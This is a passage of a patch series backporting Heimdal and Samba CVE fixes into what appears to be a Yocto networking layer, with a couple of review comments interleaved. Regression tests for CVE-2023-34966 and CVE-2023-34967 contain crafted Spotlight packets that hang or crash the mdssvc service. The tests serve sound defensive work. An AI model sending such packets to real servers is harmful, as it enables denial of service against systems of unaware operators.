GSS_S_BAD_MECH; ++ if (mech_len > total_len) ++ return GSS_S_BAD_MECH; ++ if (p - *str > total_len - mech_len) ++ return GSS_S_BAD_MECH; + if (ct_memcmp(p, + mech->elements, + mech->length) != 0) 
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0006.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0006.patch
new file mode 100644
index 0000000000..9fa59c29b0
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0006.patch
@@ -0,0 +1,65 @@ +From be9bbd93ed8f204b4bc1b92d1bc3c16aac194696 Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Mon, 15 Aug 2022 16:54:23 +1200 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Check buffer length against overflow + for DES{,3} unwrap + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/be9bbd93ed8f204b4bc1b92d1bc3c16aac194696] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/unwrap.c | 14 ++++++++++++++ + 1 file changed, 14 insertions(+) + +diff --git a/lib/gssapi/krb5/unwrap.c b/lib/gssapi/krb5/unwrap.c +index d3987240dd..fddb64bc53 100644 +--- a/lib/gssapi/krb5/unwrap.c ++++ b/lib/gssapi/krb5/unwrap.c +@@ -64,6 +64,8 @@ unwrap_des + + if (IS_DCE_STYLE(context_handle)) { + token_len = 22 + 8 + 15; /* 45 */ ++ if (input_message_buffer->length < token_len) ++ return GSS_S_BAD_MECH; + } else { + token_len = input_message_buffer->length; + } +@@ -76,6 +78,11 @@ unwrap_des + if (ret) + return ret; + ++ len = (p - (u_char *)input_message_buffer->value) ++ + 22 + 8; ++ if (input_message_buffer->length < len) ++ return GSS_S_BAD_MECH; ++ + if (memcmp (p, "\x00\x00", 2) != 0) + return GSS_S_BAD_SIG; + p += 2; +@@ -216,6 +223,8 @@ unwrap_des3 + + if (IS_DCE_STYLE(context_handle)) { + token_len = 34 + 8 + 15; /* 57 */ ++ if (input_message_buffer->length < token_len) ++ return GSS_S_BAD_MECH; + } else { + token_len = input_message_buffer->length; + } +@@ -228,6 +237,11 @@ unwrap_des3 + if (ret) + return ret; + ++ len = (p - (u_char *)input_message_buffer->value) ++ + 34 + 8; ++ if (input_message_buffer->length < len) ++ return GSS_S_BAD_MECH; ++ + if (ct_memcmp (p, "\x04\x00", 2) != 0) /* HMAC SHA1 DES3_KD */ + return GSS_S_BAD_SIG; + p += 2; 
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0007.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0007.patch new file mode 100644 index 0000000000..b3197afc34 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0007.patch @@ -0,0 +1,39 @@ +From c8407ca079294d76a5ed140ba5b546f870d23ed2 Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Mon, 10 Oct 2022 20:33:09 +1300 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Check for overflow in + _gsskrb5_get_mech() + +If len_len is equal to total_len - 1 (i.e. the input consists only of a +0x60 byte and a length), the expression 'total_len - 1 - len_len - 1', +used as the 'len' parameter to der_get_length(), will overflow to +SIZE_MAX. Then der_get_length() will proceed to read, unconstrained, +whatever data follows in memory. Add a check to ensure that doesn't +happen. + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/c8407ca079294d76a5ed140ba5b546f870d23ed2] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/decapsulate.c | 2 ++ + 1 file changed, 2 insertions(+) + +diff --git a/lib/gssapi/krb5/decapsulate.c b/lib/gssapi/krb5/decapsulate.c +index 031a621eab..d7b75a6422 100644 +--- a/lib/gssapi/krb5/decapsulate.c ++++ b/lib/gssapi/krb5/decapsulate.c +@@ -54,6 +54,8 @@ _gsskrb5_get_mech (const u_char *ptr, + e = der_get_length (p, total_len - 1, &len, &len_len); + if (e || 1 + len_len + len != total_len) + return -1; ++ if (total_len < 1 + len_len + 1) ++ return -1; + p += len_len; + if (*p++ != 0x06) + return -1; 
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0008.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0008.patch new file mode 100644 index 0000000000..6d64312211 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0008.patch @@ -0,0 +1,48 @@ +From 8fb508a25a6a47289c73e3f4339352a73a396eef Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Wed, 12 Oct 2022 13:57:33 +1300 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Pass correct length to + _gssapi_verify_pad() + +We later subtract 8 when calculating the length of the output message +buffer. If padlength is excessively high, this calculation can underflow +and result in a very large positive value. + +Now we properly constrain the value of padlength so underflow shouldn't +be possible. + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/8fb508a25a6a47289c73e3f4339352a73a396eef] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/unwrap.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/lib/gssapi/krb5/unwrap.c b/lib/gssapi/krb5/unwrap.c +index fddb64bc53..bab30f4501 100644 +--- a/lib/gssapi/krb5/unwrap.c ++++ b/lib/gssapi/krb5/unwrap.c +@@ -124,7 +124,7 @@ unwrap_des + } else { + /* check pad */ + ret = _gssapi_verify_pad(input_message_buffer, +- input_message_buffer->length - len, ++ input_message_buffer->length - len - 8, + &padlength); + if (ret) + return ret; +@@ -289,7 +289,7 @@ unwrap_des3 + } else { + /* check pad */ + ret = _gssapi_verify_pad(input_message_buffer, +- input_message_buffer->length - len, ++ input_message_buffer->length - len - 8, + &padlength); + if (ret) + return ret; 
diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-41916.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-41916.patch new file mode 100644 index 0000000000..07f4a18a2f --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-41916.patch @@ -0,0 +1,38 @@ +From eb87af0c2d189c25294c7daf483a47b03af80c2c Mon Sep 17 00:00:00 2001 +From: Jeffrey Altman <jaltman@secure-endpoints.com> +Date: Wed, 17 Nov 2021 20:00:29 -0500 +Subject: [PATCH] lib/wind: find_normalize read past end of array + +find_normalize() can under some circumstances read one element +beyond the input array. The contents are discarded immediately +without further use. + +This change prevents the unintended read. + +(cherry picked from commit 357a38fc7fb582ae73f4b7f4a90a4b0b871b149e) + +Change-Id: Ia2759a5632d64f7fa6553f879b5bbbf43ba3513e + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/eb87af0c2d189c25294c7daf483a47b03af80c2c] +CVE: CVE-2022-41916 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/wind/normalize.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/lib/wind/normalize.c b/lib/wind/normalize.c +index 20e8a4a04b..8f3991d10e 100644 +--- a/lib/wind/normalize.c ++++ b/lib/wind/normalize.c +@@ -227,9 +227,9 @@ find_composition(const uint32_t *in, unsigned in_len) + unsigned i; + + if (n % 5 == 0) { +- cur = *in++; + if (in_len-- == 0) + return c->val; ++ cur = *in++; + } + + i = cur >> 16; diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-45142.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-45142.patch new file mode 100644 index 0000000000..d6b9826e4b --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-45142.patch 
@@ -0,0 +1,51 @@ +From: Helmut Grohne <helmut@...divi.de> +Subject: [PATCH v3] CVE-2022-45142: gsskrb5: fix accidental logic inversions + +The referenced commit attempted to fix miscompilations with gcc-9 and +gcc-10 by changing `memcmp(...)` to `memcmp(...) != 0`. Unfortunately, +it also inverted the result of the comparison in two occasions. This +inversion happened during backporting the patch to 7.7.1 and 7.8.0. + +Fixes: f6edaafcfefd ("gsskrb5: CVE-2022-3437 Use constant-time memcmp() + for arcfour unwrap") +Signed-off-by: Helmut Grohne <helmut@...divi.de> + +Upstream-Status: Backport [https://www.openwall.com/lists/oss-security/2023/02/08/1] +CVE: CVE-2022-45142 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/arcfour.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +Changes since v1: + * Fix typo in commit message. + * Mention 7.8.0 in commit message. Thanks to Jeffrey Altman. + +Changes since v2: + * Add CVE identifier. + +diff --git a/lib/gssapi/krb5/arcfour.c b/lib/gssapi/krb5/arcfour.c +index e838d007a..eee6ad72f 100644 +--- a/lib/gssapi/krb5/arcfour.c ++++ b/lib/gssapi/krb5/arcfour.c +@@ -365,7 +365,7 @@ _gssapi_verify_mic_arcfour(OM_uint32 * minor_status, + return GSS_S_FAILURE; + } + +- cmp = (ct_memcmp(cksum_data, p + 8, 8) == 0); ++ cmp = (ct_memcmp(cksum_data, p + 8, 8) != 0); + if (cmp) { + *minor_status = 0; + return GSS_S_BAD_MIC; +@@ -730,7 +730,7 @@ OM_uint32 _gssapi_unwrap_arcfour(OM_uint32 *minor_status, + return GSS_S_FAILURE; + } + +- cmp = (ct_memcmp(cksum_data, p0 + 16, 8) == 0); /* SGN_CKSUM */ ++ cmp = (ct_memcmp(cksum_data, p0 + 16, 8) != 0); /* SGN_CKSUM */ + if (cmp) { + _gsskrb5_release_buffer(minor_status, output_message_buffer); + *minor_status = 0; +-- +2.38.1 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-0922.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-0922.patch new file mode 100644 index 0000000000..b8cb06bee1 
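Review bot: The provenance of this patch is weaker than that of the rest of the series: `Upstream-Status` points at an oss-security post instead of a Heimdal commit, there is no `From <sha>` line, and the `From:` and `Signed-off-by:` addresses are the list archive's masked form (`helmut@...divi.de`). If the fix has since been merged upstream, referencing that commit as `Upstream-Status: Backport [<heimdal commit URL>]` would let later reviewers diff the backport against the authoritative source. Until then, a header line stating that the patch text was taken from the mailing-list archive would make the origin explicit.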
--- /dev/null
+++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-0922.patch
@@ -0,0 +1,111 @@ +From 04e5a7eb03a1e913f34d77b7b6c2353b41ef546a Mon Sep 17 00:00:00 2001 +From: Rob van der Linde <rob@catalyst.net.nz> +Date: Mon, 27 Feb 2023 14:06:23 +1300 +Subject: [PATCH] CVE-2023-0922 set default ldap client sasl wrapping to seal + +This avoids sending new or reset passwords in the clear +(integrity protected only) from samba-tool in particular. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15315 + +Signed-off-by: Rob van der Linde <rob@catalyst.net.nz> +Signed-off-by: Andrew Bartlett <abartlet@samba.org> +Reviewed-by: Joseph Sutton <josephsutton@catalyst.net.nz> + +CVE: CVE-2023-0922 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/04e5a7eb03a] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + .../ldap/clientldapsaslwrapping.xml | 27 +++++++++---------- + lib/param/loadparm.c | 2 +- + python/samba/tests/auth_log.py | 2 +- + source3/param/loadparm.c | 2 +- + 4 files changed, 16 insertions(+), 17 deletions(-) + +diff --git a/docs-xml/smbdotconf/ldap/clientldapsaslwrapping.xml b/docs-xml/smbdotconf/ldap/clientldapsaslwrapping.xml +index 3152f06..21bd209 100644 +--- a/docs-xml/smbdotconf/ldap/clientldapsaslwrapping.xml ++++ b/docs-xml/smbdotconf/ldap/clientldapsaslwrapping.xml +@@ -18,25 +18,24 @@ + </para> + + <para> +- This option is needed in the case of Domain Controllers enforcing +- the usage of signed LDAP connections (e.g. Windows 2000 SP3 or higher). +- LDAP sign and seal can be controlled with the registry key +- "<literal>HKLM\System\CurrentControlSet\Services\</literal> +- <literal>NTDS\Parameters\LDAPServerIntegrity</literal>" +- on the Windows server side. +- </para> ++ This option is needed firstly to secure the privacy of ++ administrative connections from <command>samba-tool</command>, ++ including in particular new or reset passwords for users. 
For ++ this reason the default is <emphasis>seal</emphasis>.</para> + +- <para> +- Depending on the used KRB5 library (MIT and older Heimdal versions) +- it is possible that the message "integrity only" is not supported. +- In this case, <emphasis>sign</emphasis> is just an alias for +- <emphasis>seal</emphasis>. ++ <para>Additionally, <command>winbindd</command> and the ++ <command>net</command> tool can use LDAP to communicate with ++ Domain Controllers, so this option also controls the level of ++ privacy for those connections. All supported AD DC versions ++ will enforce the usage of at least signed LDAP connections by ++ default, so a value of at least <emphasis>sign</emphasis> is ++ required in practice. + </para> + + <para> +- The default value is <emphasis>sign</emphasis>. That implies synchronizing the time ++ The default value is <emphasis>seal</emphasis>. That implies synchronizing the time + with the KDC in the case of using <emphasis>Kerberos</emphasis>. + </para> + </description> +-<value type="default">sign</value> ++<value type="default">seal</value> + </samba:parameter> +diff --git a/lib/param/loadparm.c b/lib/param/loadparm.c +index 75687f5..d260691 100644 +--- a/lib/param/loadparm.c ++++ b/lib/param/loadparm.c +@@ -2970,7 +2970,7 @@ struct loadparm_context *loadparm_init(TALLOC_CTX *mem_ctx) + + lpcfg_do_global_parameter(lp_ctx, "ldap debug threshold", "10"); + +- lpcfg_do_global_parameter(lp_ctx, "client ldap sasl wrapping", "sign"); ++ lpcfg_do_global_parameter(lp_ctx, "client ldap sasl wrapping", "seal"); + + lpcfg_do_global_parameter(lp_ctx, "mdns name", "netbios"); + +diff --git a/python/samba/tests/auth_log.py b/python/samba/tests/auth_log.py +index 8ac76fe..d2db380 100644 +--- a/python/samba/tests/auth_log.py ++++ b/python/samba/tests/auth_log.py +@@ -471,7 +471,7 @@ class AuthLogTests(samba.tests.auth_log_base.AuthLogTestBase): + def isLastExpectedMessage(msg): + return (msg["type"] == "Authorization" and + 
msg["Authorization"]["serviceDescription"] == "LDAP" and +- msg["Authorization"]["transportProtection"] == "SIGN" and ++ msg["Authorization"]["transportProtection"] == "SEAL" and + msg["Authorization"]["authType"] == "krb5") + + self.samdb = SamDB(url="ldap://%s" % os.environ["SERVER"], +diff --git a/source3/param/loadparm.c b/source3/param/loadparm.c +index a99ab35..c47c5f6 100644 +--- a/source3/param/loadparm.c ++++ b/source3/param/loadparm.c +@@ -754,7 +754,7 @@ static void init_globals(struct loadparm_context *lp_ctx, bool reinit_globals) + Globals.ldap_debug_level = 0; + Globals.ldap_debug_threshold = 10; + +- Globals.client_ldap_sasl_wrapping = ADS_AUTH_SASL_SIGN; ++ Globals.client_ldap_sasl_wrapping = ADS_AUTH_SASL_SEAL; + + Globals.ldap_server_require_strong_auth = + LDAP_SERVER_REQUIRE_STRONG_AUTH_YES; +-- +2.40.0 + diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0001.patch new file mode 100644 index 0000000000..77a383f09e --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0001.patch 
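Review bot: Only the built-in default moves from `sign` to `seal` here (`lpcfg_do_global_parameter(lp_ctx, "client ldap sasl wrapping", "seal")` and `Globals.client_ldap_sasl_wrapping = ADS_AUTH_SASL_SEAL`), so an image that ships an smb.conf with an explicit `client ldap sasl wrapping = sign` or `plain` keeps the exposure the CVE describes. Please check the smb.conf files installed by this recipe and by dependent layers for such a setting. A header line such as `Note: an explicit "client ldap sasl wrapping" value in smb.conf overrides this default` would make that limit visible to integrators.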
@@ -0,0 +1,78 @@ +From 38664163fcac985d87e4274d198568e0fe88595e Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Fri, 26 May 2023 13:06:19 +0200 +Subject: [PATCH] CVE-2023-34966: mdssvc: harden sl_unpack_loop() + +A malicious client could send a packet where subcount is zero, leading to a busy +loop because + + count -= subcount +=> count -= 0 +=> while (count > 0) + +loops forever. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15340 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/38664163fcac985d87e4274d198568e0fe88595e] + +CVE: CVE-2023-34966 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/rpc_server/mdssvc/marshalling.c | 10 +++++----- + 1 file changed, 5 insertions(+), 5 deletions(-) + +diff --git a/source3/rpc_server/mdssvc/marshalling.c b/source3/rpc_server/mdssvc/marshalling.c +index 9ba6ef571f2..d794ba15838 100644 +--- a/source3/rpc_server/mdssvc/marshalling.c ++++ b/source3/rpc_server/mdssvc/marshalling.c +@@ -1119,7 +1119,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + sl_nil_t nil = 0; + + subcount = tag.count; +- if (subcount > count) { ++ if (subcount < 1 || subcount > count) { + return -1; + } + for (i = 0; i < subcount; i++) { +@@ -1147,7 +1147,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + + case SQ_TYPE_INT64: + subcount = sl_unpack_ints(query, buf, offset, bufsize, encoding); +- if (subcount == -1 || subcount > count) { ++ if (subcount < 1 || subcount > count) { + return -1; + } + offset += tag.size; +@@ -1156,7 +1156,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + + case SQ_TYPE_UUID: + subcount = sl_unpack_uuid(query, buf, offset, bufsize, encoding); +- if (subcount == -1 || subcount > count) { ++ if (subcount < 1 || subcount > count) { + return -1; + } + offset += tag.size; +@@ -1165,7 +1165,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + + case SQ_TYPE_FLOAT: + subcount = 
sl_unpack_floats(query, buf, offset, bufsize, encoding); +- if (subcount == -1 || subcount > count) { ++ if (subcount < 1 || subcount > count) { + return -1; + } + offset += tag.size; +@@ -1174,7 +1174,7 @@ static ssize_t sl_unpack_loop(DALLOC_CTX *query, + + case SQ_TYPE_DATE: + subcount = sl_unpack_date(query, buf, offset, bufsize, encoding); +- if (subcount == -1 || subcount > count) { ++ if (subcount < 1 || subcount > count) { + return -1; + } + offset += tag.size; +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0002.patch new file mode 100644 index 0000000000..a86d1729cf --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34966_0002.patch 
@@ -0,0 +1,140 @@ +From 10b6890d26b3c7a829a9e9a05ad1d1ff54daeca9 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Wed, 31 May 2023 15:34:26 +0200 +Subject: [PATCH] CVE-2023-34966: CI: test for sl_unpack_loop() + +Send a maliciously crafted packet where a nil type has a subcount of 0. This +triggers an endless loop in mdssvc sl_unpack_loop(). + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15340 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/10b6890d26b3c7a829a9e9a05ad1d1ff54daeca9] + +CVE: CVE-2023-34966 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source4/torture/rpc/mdssvc.c | 100 +++++++++++++++++++++++++++++++++++ + 1 file changed, 100 insertions(+) + +diff --git a/source4/torture/rpc/mdssvc.c b/source4/torture/rpc/mdssvc.c +index 2d2a8306412..a9956ef8f1d 100644 +--- a/source4/torture/rpc/mdssvc.c ++++ b/source4/torture/rpc/mdssvc.c +@@ -581,6 +581,102 @@ done: + return ok; + } + ++static uint8_t test_sl_unpack_loop_buf[] = { ++ 0x34, 0x33, 0x32, 0x31, 0x33, 0x30, 0x64, 0x6d, ++ 0x1d, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x02, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x03, 0x00, 0x00, 0x00, ++ 0x06, 0x00, 0x00, 0x07, 0x04, 0x00, 0x00, 0x00, ++ 0x66, 0x65, 0x74, 0x63, 0x68, 0x41, 0x74, 0x74, ++ 0x72, 0x69, 0x62, 0x75, 0x74, 0x65, 0x73, 0x3a, ++ 0x66, 0x6f, 0x72, 0x4f, 0x49, 0x44, 0x41, 0x72, ++ 0x72, 0x61, 0x79, 0x3a, 0x63, 0x6f, 0x6e, 0x74, ++ 0x65, 0x78, 0x74, 0x3a, 0x00, 0x00, 0x00, 0xea, ++ 0x02, 0x00, 0x00, 0x84, 0x02, 0x00, 0x00, 0x00, ++ 0x0a, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x04, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x05, 0x00, 0x00, 0x00, ++ 0x03, 0x00, 0x00, 0x07, 0x03, 0x00, 0x00, 0x00, ++ 0x6b, 0x4d, 0x44, 0x49, 0x74, 0x65, 0x6d, 0x50, ++ 
0x61, 0x74, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0x00, 0x02, 0x06, 0x00, 0x00, 0x00, ++ 0x03, 0x00, 0x00, 0x87, 0x08, 0x00, 0x00, 0x00, ++ 0x01, 0x00, 0xdd, 0x0a, 0x20, 0x00, 0x00, 0x6b, ++ 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x07, 0x00, 0x00, 0x88, 0x00, 0x00, 0x00, 0x00, ++ 0x02, 0x00, 0x00, 0x0a, 0x03, 0x00, 0x00, 0x00, ++ 0x03, 0x00, 0x00, 0x0a, 0x03, 0x00, 0x00, 0x00, ++ 0x04, 0x00, 0x00, 0x0c, 0x04, 0x00, 0x00, 0x00, ++ 0x0e, 0x00, 0x00, 0x0a, 0x01, 0x00, 0x00, 0x00, ++ 0x0f, 0x00, 0x00, 0x0c, 0x03, 0x00, 0x00, 0x00, ++ 0x13, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, ++ 0x00, 0x00, 0x00, 0x00 ++}; ++ ++static bool test_mdssvc_sl_unpack_loop(struct torture_context *tctx, ++ void *data) ++{ ++ struct torture_mdsscv_state *state = talloc_get_type_abort( ++ data, struct torture_mdsscv_state); ++ struct dcerpc_binding_handle *b = state->p->binding_handle; ++ struct mdssvc_blob request_blob; ++ struct mdssvc_blob response_blob; ++ uint32_t device_id; ++ uint32_t unkn2; ++ uint32_t unkn9; ++ uint32_t fragment; ++ uint32_t flags; ++ NTSTATUS status; ++ bool ok = true; ++ ++ device_id = UINT32_C(0x2f000045); ++ unkn2 = 23; ++ unkn9 = 0; ++ fragment = 0; ++ flags = UINT32_C(0x6b000001); ++ ++ request_blob.spotlight_blob = test_sl_unpack_loop_buf; ++ request_blob.size = sizeof(test_sl_unpack_loop_buf); ++ request_blob.length = sizeof(test_sl_unpack_loop_buf); ++ ++ response_blob.spotlight_blob = talloc_array(state, ++ uint8_t, ++ 0); ++ torture_assert_not_null_goto(tctx, response_blob.spotlight_blob, ++ ok, done, "dalloc_zero failed\n"); ++ response_blob.size = 0; ++ ++ status = dcerpc_mdssvc_cmd(b, ++ state, ++ &state->ph, ++ 0, ++ device_id, ++ unkn2, ++ 0, ++ flags, ++ request_blob, ++ 0, ++ 64 * 1024, ++ 1, ++ 64 * 1024, ++ 0, ++ 0, ++ &fragment, ++ &response_blob, ++ &unkn9); ++ 
torture_assert_ntstatus_ok_goto( ++ tctx, status, ok, done, ++ "dcerpc_mdssvc_unknown1 failed\n"); ++ ++done: ++ return ok; ++} ++ + static bool test_mdssvc_invalid_ph_close(struct torture_context *tctx, + void *data) + { +@@ -856,5 +952,9 @@ struct torture_suite *torture_rpc_mdssvc(TALLOC_CTX *mem_ctx) + "fetch_unknown_cnid", + test_mdssvc_fetch_attr_unknown_cnid); + ++ torture_tcase_add_simple_test(tcase, ++ "mdssvc_sl_unpack_loop", ++ test_mdssvc_sl_unpack_loop); ++ + return suite; + } +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0001.patch new file mode 100644 index 0000000000..e30e54ab96 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2023-34967_0001.patch 
@@ -0,0 +1,178 @@ +From 3b3c30e2acfb00d04c4013e32343bc277d5b1aa8 Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Wed, 31 May 2023 16:26:14 +0200 +Subject: [PATCH] CVE-2023-34967: CI: add a test for type checking of + dalloc_value_for_key() + +Sends a maliciously crafted packet where the value in a key/value style +dictionary for the "scope" key is a simple string object whereas the server +expects an array. As the server doesn't perform type validation on the value, it +crashes when trying to use the "simple" object as a "complex" one. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15341 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/3b3c30e2acfb00d04c4013e32343bc277d5b1aa8] + +CVE: CVE-2023-34967 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source4/torture/rpc/mdssvc.c | 134 +++++++++++++++++++++++++++++++++++ + 1 file changed, 134 insertions(+) + +diff --git a/source4/torture/rpc/mdssvc.c b/source4/torture/rpc/mdssvc.c +index f5f5939..1dce403 100644 +--- a/source4/torture/rpc/mdssvc.c ++++ b/source4/torture/rpc/mdssvc.c +@@ -666,6 +666,136 @@ done: + return ok; + } + ++static bool test_sl_dict_type_safety(struct torture_context *tctx, ++ void *data) ++{ ++ struct torture_mdsscv_state *state = talloc_get_type_abort( ++ data, struct torture_mdsscv_state); ++ struct dcerpc_binding_handle *b = state->p->binding_handle; ++ struct mdssvc_blob request_blob; ++ struct mdssvc_blob response_blob; ++ uint64_t ctx1 = 0xdeadbeef; ++ uint64_t ctx2 = 0xcafebabe; ++ uint32_t device_id; ++ uint32_t unkn2; ++ uint32_t unkn9; ++ uint32_t fragment; ++ uint32_t flags; ++ DALLOC_CTX *d = NULL; ++ sl_array_t *array1 = NULL, *array2 = NULL; ++ sl_dict_t *arg = NULL; ++ int result; ++ NTSTATUS status; ++ bool ok = true; ++ ++ device_id = UINT32_C(0x2f000045); ++ unkn2 = 23; ++ unkn9 = 0; ++ fragment = 0; ++ flags = UINT32_C(0x6b000001); ++ ++ d = 
dalloc_new(tctx); ++ torture_assert_not_null_goto(tctx, d, ++ ok, done, "dalloc_new failed\n"); ++ ++ array1 = dalloc_zero(d, sl_array_t); ++ torture_assert_not_null_goto(tctx, array1, ++ ok, done, "dalloc_zero failed\n"); ++ ++ array2 = dalloc_zero(d, sl_array_t); ++ torture_assert_not_null_goto(tctx, array2, ++ ok, done, "dalloc_new failed\n"); ++ ++ result = dalloc_stradd(array2, "openQueryWithParams:forContext:"); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_add_copy(array2, &ctx1, uint64_t); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_add_copy(array2, &ctx2, uint64_t); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ arg = dalloc_zero(array1, sl_dict_t); ++ torture_assert_not_null_goto(tctx, d, ++ ok, done, "dalloc_zero failed\n"); ++ ++ result = dalloc_stradd(arg, "kMDQueryString"); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_stradd(arg, "*"); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_stradd(arg, "kMDScopeArray"); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_stradd(arg, "AAAABBBB"); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_stradd failed\n"); ++ ++ result = dalloc_add(array1, array2, sl_array_t); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_add failed\n"); ++ ++ result = dalloc_add(array1, arg, sl_dict_t); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, "dalloc_add failed\n"); ++ ++ result = dalloc_add(d, array1, sl_array_t); ++ torture_assert_goto(tctx, result == 0, ++ ok, done, 